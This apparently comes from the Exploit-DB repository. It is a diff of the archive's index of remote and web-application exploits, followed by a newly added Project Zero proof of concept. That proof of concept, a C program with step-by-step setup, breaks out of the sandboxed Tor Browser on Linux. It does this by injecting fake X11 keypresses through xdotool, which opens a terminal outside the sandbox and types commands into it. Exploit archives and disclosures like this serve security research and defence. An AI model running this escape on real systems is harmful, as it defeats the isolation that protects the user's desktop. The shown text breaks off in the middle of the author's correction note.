21025,platforms/multiple/remote/21025.txt,"Proxomitron Naoko-4 - Cross-Site Scripting",2001-07-24,"TAKAGI Hiromitsu",multiple,remote,0
21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 - pagecount File Overwrite",2001-07-22,kyprizel,multiple,remote,0
21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 - 'pagecount' File Overwrite",2001-07-22,kyprizel,multiple,remote,0
21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 - Insecure Default Password Protection",2001-07-25,3APA3A,multiple,remote,0
21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0
21030,platforms/windows/remote/21030.txt,"SnapStream Personal Video Station 1.2 a - PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0
@ -12926,7 +12929,7 @@ id,file,description,date,author,platform,type,port
22178,platforms/multiple/remote/22178.xml,"Sun ONE Unified Development Server 5.0 - Recursive Document Type Definition",2003-01-15,"Sun Microsystems",multiple,remote,0
22179,platforms/multiple/remote/22179.pl,"CSO Lanifex Outreach Project Tool 0.946b - Request Origin Spoofing",2003-01-16,"Martin Eiszner",multiple,remote,0
22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0
22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - results.stm Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0
22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - 'results.stm' Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0
22187,platforms/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double-Free Heap Corruption",2003-01-20,"Stefan Esser",linux,remote,0
22194,platforms/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4.0 - Locator Service Buffer Overflow",2003-01-22,"David Litchfield",windows,remote,0
22200,platforms/multiple/remote/22200.txt,"SyGate 5.0 - Insecure UDP Source Port Firewall Bypass Weak Default Configuration",2003-01-24,"David Fernández",multiple,remote,0
@ -12973,7 +12976,7 @@ id,file,description,date,author,platform,type,port
22351,platforms/windows/remote/22351.py,"Freefloat FTP Server - 'PUT' Command Buffer Overflow",2012-10-30,"Jacob Holcomb",windows,remote,0
22353,platforms/linux/remote/22353.c,"BitchX 1.0 - Remote 'Send_CTCP()' Memory Corruption",2003-03-06,eSDee,linux,remote,0
22355,platforms/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 - 'texis.exe' Information Disclosure",2003-03-14,sir.mordred@hushmail.com,cgi,remote,0
22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,unix,remote,0
22356,platforms/unix/remote/22356.c,"Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,unix,remote,0
22361,platforms/linux/remote/22361.cpp,"Qpopper 3/4 - 'Username' Information Disclosure",2003-03-11,plasmahh,linux,remote,0
22365,platforms/windows/remote/22365.pl,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (1)",2003-03-24,mat,windows,remote,0
22366,platforms/windows/remote/22366.c,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (2)",2003-03-31,ThreaT,windows,remote,0
@ -12999,7 +13002,7 @@ id,file,description,date,author,platform,type,port
22454,platforms/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",linux,remote,0
22455,platforms/hardware/remote/22455.txt,"NETGEAR FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,hardware,remote,0
22462,platforms/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",multiple,remote,0
22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - (SEH) Stack Overflow ROP-Based Exploit (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - Stack Overflow ROP-Based Exploit (SEH) (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
22468,platforms/unix/remote/22468.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)",2003-04-11,Xpl017Elz,unix,remote,0
22469,platforms/unix/remote/22469.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)",2003-04-07,c0wboy,unix,remote,0
22470,platforms/unix/remote/22470.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)",2003-05-12,eDSee,unix,remote,0
@ -13425,7 +13428,7 @@ id,file,description,date,author,platform,type,port
24065,platforms/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,hardware,remote,0
24067,platforms/unix/remote/24067.c,"LHA 1.x - Buffer Overflow / Directory Traversal",2004-04-30,N4rK07IX,unix,remote,0
24069,platforms/windows/remote/24069.html,"Microsoft Internet Explorer 6 - Meta Data Foreign Domain Spoofing",2004-04-30,E.Kellinis,windows,remote,0
24076,platforms/windows/remote/24076.txt,"Sambar 5.x - Open Proxy / Authentication Bypass",2003-01-30,"David Endler",windows,remote,0
24076,platforms/windows/remote/24076.txt,"Sambar Server 5.x - Open Proxy / Authentication Bypass",2003-01-30,"David Endler",windows,remote,0
24077,platforms/windows/remote/24077.txt,"Business Objects Crystal Reports 9/10 Web Form Viewer - Directory Traversal",2004-05-03,"Imperva Application Defense Center",windows,remote,0
24079,platforms/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String",2004-05-03,"Nilanjan De",linux,remote,0
24084,platforms/multiple/remote/24084.py,"Nagios3 - history.cgi Remote Command Execution",2013-01-13,blasty,multiple,remote,0
@ -13455,9 +13458,9 @@ id,file,description,date,author,platform,type,port
24189,platforms/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,multiple,remote,0
24159,platforms/linux/remote/24159.rb,"Nagios3 - history.cgi Host Command Execution (Metasploit)",2013-01-16,Metasploit,linux,remote,0
24160,platforms/linux/remote/24160.txt,"SquirrelMail 1.x - Email Header HTML Injection",2004-05-31,"Roman Medina",linux,remote,0
24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - show.asp show Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - showperf.asp title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - showini.asp Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0
24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - 'show.asp' show Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - 'showperf.asp' title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0
24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0
24174,platforms/windows/remote/24174.txt,"Microsoft Internet Explorer 6 - URL Local Resource Access",2004-06-06,"Rafel Ivgi The-Insider",windows,remote,0
24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure",2004-06-08,"Vickenty Fesunov",linux,remote,0
@ -13777,7 +13780,7 @@ id,file,description,date,author,platform,type,port
25684,platforms/hardware/remote/25684.html,"D-Link DSL Router - Remote Authentication Bypass",2005-05-19,"Francesco Orro",hardware,remote,0
25687,platforms/freebsd/remote/25687.c,"Picasm 1.10/1.12 - Error Generation Remote Buffer Overflow",2005-05-20,"Shaun Colley",freebsd,remote,0
25691,platforms/multiple/remote/25691.txt,"Warrior Kings 1.3 And Warrior Kings: Battles 1.23 - Remote Format String",2005-05-23,"Luigi Auriemma",multiple,remote,0
25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 - results.stm indexname Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0
25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 - 'results.stm' indexname Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0
25695,platforms/windows/remote/25695.txt,"Sambar Server 5.x/6.0/6.1 - logout RCredirect Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0
25696,platforms/windows/remote/25696.txt,"Sambar Server 5.x/6.0/6.1 - Server Referer Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0
25697,platforms/windows/remote/25697.txt,"Blue Coat Reporter 7.0/7.1 - Privilege Escalation",2005-05-24,"Oliver Karow",windows,remote,0
@ -14714,15 +14717,15 @@ id,file,description,date,author,platform,type,port
33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0
33471,platforms/hardware/remote/33471.txt,"D-Link DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,hardware,remote,0
40344,platforms/php/remote/40344.rb,"SugarCRM 6.5.23 - REST PHP Object Injection Exploit (Metasploit)",2016-09-07,"Egidio Romano",php,remote,80
33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 - WEBrick Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 - WEBrick 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33490,platforms/multiple/remote/33490.txt,"Nginx 0.7.64 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal 4.5.1 - Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33499,platforms/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33500,platforms/multiple/remote/33500.txt,"mini_httpd 1.18 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33501,platforms/windows/remote/33501.txt,"Cherokee 0.99.30 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0
33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0
33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,windows,remote,0
33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33504,platforms/multiple/remote/33504.txt,"BOA Web Server 0.94.x - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming - Arbitrary File Upload (Metasploit)",2014-05-26,Metasploit,multiple,remote,9855
33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Directory Traversal",2010-02-08,Markot,windows,remote,0
@ -15518,7 +15521,7 @@ id,file,description,date,author,platform,type,port
39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80
39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Exploit (Shellshock)",2016-03-16,thatchriseckert,hardware,remote,443
39569,platforms/multiple/remote/39569.py,"OpenSSH 7.2p1 - Authenticated xauth Command Injection",2016-03-16,tintinweb,multiple,remote,22
39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share Overflow (SEH) Remote Code Execution (SEH)",2016-03-21,"Paul Purcell",windows,remote,80
39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share Overflow Remote Code Execution (SEH)",2016-03-21,"Paul Purcell",windows,remote,80
39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0
39599,platforms/windows/remote/39599.txt,"Comodo AntiVirus - Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0
39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0
@ -15577,7 +15580,7 @@ id,file,description,date,author,platform,type,port
40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80
40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,linux,remote,8000
40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,linux,remote,8000
40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - (SEH) Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80
40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - Overflow (Egghunter) (SEH)",2016-07-29,ch3rn0byl,windows,remote,80
40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
40232,platforms/linux/remote/40232.py,"FreePBX 13/14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0
@ -15746,7 +15749,7 @@ id,file,description,date,author,platform,type,port
42026,platforms/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",xml,remote,0
42031,platforms/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445
42083,platforms/windows/remote/42083.rb,"Octopus Deploy - Authenticated Code Execution (Metasploit)",2017-05-29,Metasploit,windows,remote,0
42084,platforms/linux/remote/42084.rb,"Samba - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,linux,remote,0
42084,platforms/linux/remote/42084.rb,"Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,linux,remote,0
42041,platforms/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote,0
42057,platforms/windows/remote/42057.rb,"VX Search Enterprise 9.5.12 - GET Buffer Overflow (Metasploit)",2017-05-23,Metasploit,windows,remote,0
42060,platforms/linux/remote/42060.py,"Samba 3.5.0 - Remote Code Execution",2017-05-24,steelo,linux,remote,0
@ -21920,7 +21923,7 @@ id,file,description,date,author,platform,type,port
9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0
9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0
9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0
9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - Privileges Unchecked in 'admin.php' / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0
9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0
9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0
@ -22417,7 +22420,7 @@ id,file,description,date,author,platform,type,port
10290,platforms/php/webapps/10290.txt,"Theeta CMS - Multiple Vulnerabilities",2009-12-03,c0dy,php,webapps,0
10291,platforms/php/webapps/10291.txt,"Joomla! Component ProofReader 1.0 RC6 - Cross-Site Scripting",2009-12-01,MustLive,php,webapps,0
10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,multiple,webapps,0
10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - Cross-Site Scripting / HTML Code Injection in News Module",2009-11-27,K053,php,webapps,0
10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - ' News Module Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,php,webapps,0
10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps,0
10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart - (prodid) SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0
10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
@ -26013,7 +26016,7 @@ id,file,description,date,author,platform,type,port
18815,platforms/php/webapps/18815.txt,"STRATO NewsLetter Manager - Directory Traversal",2012-05-01,"Zero X",php,webapps,0
18820,platforms/php/webapps/18820.php,"OpenConf 4.11 - 'author/edit.php' Blind SQL Injection",2012-05-02,EgiX,php,webapps,0
18824,platforms/cgi/webapps/18824.txt,"Websense Triton - Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0
18822,platforms/php/webapps/18822.txt,"PHP-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0
18822,platforms/php/webapps/18822.txt,"PHP-decoda - 'Video Tag' Cross-Site Scripting",2012-05-02,"RedTeam Pentesting",php,webapps,0
18827,platforms/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-05-03,LiquidWorm,php,webapps,0
18828,platforms/php/webapps/18828.txt,"PluXml 5.1.5 - Local File Inclusion",2012-05-03,"High-Tech Bridge SA",php,webapps,0
18832,platforms/php/webapps/18832.txt,"Symantec Web Gateway - Cross-Site Scripting",2012-05-04,B00y@,php,webapps,0
@ -37329,8 +37332,8 @@ id,file,description,date,author,platform,type,port
40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12/11 - 'main.swf' Hard-Coded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80
40114,platforms/php/webapps/40114.py,"vBulletin 4.x/5.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
40114,platforms/php/webapps/40114.py,"vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API Authenticated Persistent Cross-Site Scripting",2014-10-12,tintinweb,php,webapps,0
40115,platforms/php/webapps/40115.py,"vBulletin 4.x - breadcrumbs via xmlrpc API Authenticated SQL Injection",2014-10-12,tintinweb,php,webapps,0
40193,platforms/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",php,webapps,80
40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,linux,webapps,80
40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
@ -38062,6 +38065,7 @@ id,file,description,date,author,platform,type,port
42547,platforms/hardware/webapps/42547.py,"Wireless Repeater BE126 - Local File Inclusion",2017-08-23,"Hay Mizrachi",hardware,webapps,0
42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0
42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
42621,platforms/php/webapps/42621.html,"Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
42544,platforms/java/webapps/42544.py,"Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution",2017-08-22,LiquidWorm,java,webapps,0
41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
@ -38194,7 +38198,7 @@ id,file,description,date,author,platform,type,port
42065,platforms/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42066,platforms/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42067,platforms/multiple/webapps/42067.html,"WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42068,platforms/multiple/webapps/42068.html,"WebKit - Stealing Variables via Page Navigation in 'FrameLoader::clear'",2017-05-25,"Google Security Research",multiple,webapps,0
42068,platforms/multiple/webapps/42068.html,"WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation",2017-05-25,"Google Security Research",multiple,webapps,0
42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0
42075,platforms/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",hardware,webapps,0
@ -38390,13 +38394,17 @@ id,file,description,date,author,platform,type,port
42596,platforms/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0
42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0
42606,platforms/php/webapps/42606.txt,"Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0
42607,platforms/php/webapps/42607.txt,"Joomla! Component CheckList 1.1.0 - SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0
42608,platforms/hardware/webapps/42608.txt,"Wireless Repeater BE126 - Remote Code Execution",2017-09-04,"Hay Mizrachi",hardware,webapps,0
42610,platforms/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,multiple,webapps,0
42613,platforms/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",multiple,webapps,0
42615,platforms/php/webapps/42615.txt,"A2billing 2.x - SQL Injection",2017-09-05,0x4148,php,webapps,0
42616,platforms/php/webapps/42616.txt,"A2billing 2.x - Backup File Download / Remote Code Execution",2017-09-04,0x4148,php,webapps,0
42617,platforms/php/webapps/42617.txt,"iGreeting Cards 1.0 - SQL Injection",2017-09-04,"Ihsan Sencan",php,webapps,0
42618,platforms/php/webapps/42618.txt,"WordPress Plugin Participants Database < 1.7.5.10 - Cross-Site Scripting",2017-09-01,"Benjamin Lim",php,webapps,0
42619,platforms/php/webapps/42619.txt,"The Car Project 1.0 - SQL Injection",2017-09-05,"Ihsan Sencan",php,webapps,0
42620,platforms/php/webapps/42620.txt,"Cory Support - 'pr' Parameter SQL Injection",2017-09-06,v3n0m,php,webapps,0
42622,platforms/php/webapps/42622.html,"Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
42623,platforms/php/webapps/42623.txt,"Pay Banner Text Link Ad 1.0.6.1 - SQL Injection",2017-09-06,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

94
platforms/linux/local/42626.c Executable file
View file

@ -0,0 +1,94 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1293&desc=2
**EDIT: I mixed up two different sandboxes; see the comment below for a correction.**
From inside the Linux sandbox described in
<https://blog.torproject.org/blog/tor-browser-70-released>, it is
still possible to talk to the X server without any restrictions.
This means that a compromised browser can e.g. use the
XTEST X protocol extension
(<https://www.x.org/releases/X11R7.7/doc/xextproto/xtest.html>) to
fake arbitrary keyboard and mouse events, directed at arbitrary
windows. This permits a sandbox breakout, e.g. by injecting keypresses
into a background window.
<https://trac.torproject.org/projects/tor/wiki/doc/TorBrowser/Sandbox/Linux#HowdoIprotectmyselffromXexploits>
mentions that the X server is reachable, but it sounds like the author
didn't realize that a normal connection to the X server permits
sandbox breakouts by design.
To reproduce:
Install Debian Jessie with the Xfce4 desktop environment and with
backports enabled.
Install bubblewrap and xdotool.
Install the sandboxed Tor browser from
<https://www.torproject.org/dist/torbrowser/7.0a4/sandbox-0.0.6-linux64.zip>.
Launch the sandboxed Tor browser, use the default configuration. When
the browser has launched, close it.
Delete ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox.
Store the following as ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox.c:
=========================
*/
#include <stdlib.h>
#include <unistd.h>
int main(void){
int status;
setenv("LD_LIBRARY_PATH", "/home/amnesia/sandboxed-tor-browser/tor-browser", 1);
if (fork() == 0) {
execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "key", "alt+F2", "sleep", "1", "type", "xfce4-terminal", NULL);
perror("fail");
return 0;
}
wait(&status);
if (fork() == 0) {
execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", "sleep", "1", "type", "id", NULL);
perror("fail");
return 0;
}
wait(&status);
if (fork() == 0) {
execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", NULL);
perror("fail");
return 0;
}
wait(&status);
while (1) sleep(1000);
return 0;
}
/*
=========================
In ~/.local/share/sandboxed-tor-browser/tor-browser/Browser, run
"gcc -static -o firefox firefox.c".
Run "cp /usr/bin/xdotool /usr/lib/x86_64-linux-gnu/* ~/.local/share/sandboxed-tor-browser/tor-browser/".
Now run the launcher for the sandboxed browser again. Inside the
sandbox, the new firefox binary will connect to the X11 server and
send fake keypresses to open a terminal outside the sandbox and type
into it.
There are probably similar issues with pulseaudio when it's enabled;
I suspect that it's possible to e.g. use the pulseaudio socket to load
pulseaudio modules with arbitrary parameters, which would e.g. permit
leaking parts of files outside the sandbox by using them as
authentication cookie files for modules that implement audio streaming
over the network.
###################################################################
I mixed up two sandboxes.
